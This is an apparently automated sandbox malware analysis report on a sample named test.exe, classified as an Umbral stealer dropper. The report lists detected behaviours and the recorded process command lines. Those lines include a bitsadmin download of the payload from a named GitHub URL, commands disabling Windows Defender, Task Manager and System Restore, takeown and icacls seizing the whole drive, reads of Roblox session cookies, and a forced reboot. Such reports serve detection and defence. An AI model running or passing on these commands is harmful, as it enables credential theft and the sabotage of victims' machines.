Malware Analysis Report

2024-10-16 05:04

Sample ID 240809-mwqwdatdma
Target test.exe
SHA256 0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5
Tags
umbral credential_access discovery dropper execution exploit ransomware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5

Threat Level: Known bad

The file test.exe was found to be: Known bad.

Malicious Activity Summary

umbral credential_access discovery dropper execution exploit ransomware stealer

Detect Umbral payload

Umbral

Credentials from Password Stores: Credentials from Web Browsers

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Blocklisted process makes network request

Drops file in Drivers directory

Possible privilege escalation attempt

Drops startup file

Modifies file permissions

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Looks up external IP address via web service

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Delays execution with timeout.exe

Runs ping.exe

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Script User-Agent

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 10:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 10:49

Reported

2024-08-09 10:51

Platform

win10v2004-20240802-en

Max time kernel

97s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\test.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 892 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\test.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2996 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 2996 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2996 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2996 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2996 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4088 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 2996 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4088 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 4088 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4088 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 2248 wrote to memory of 2256 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2996 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2996 wrote to memory of 2208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2996 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2996 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2996 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\test.exe

"C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4188,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32120.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1230.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19765.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x418 0x464

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM GenshinImpact.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2297.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26761.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20056.vbs"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6180.vbs" 17222.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\17222.bat" "

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters


C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

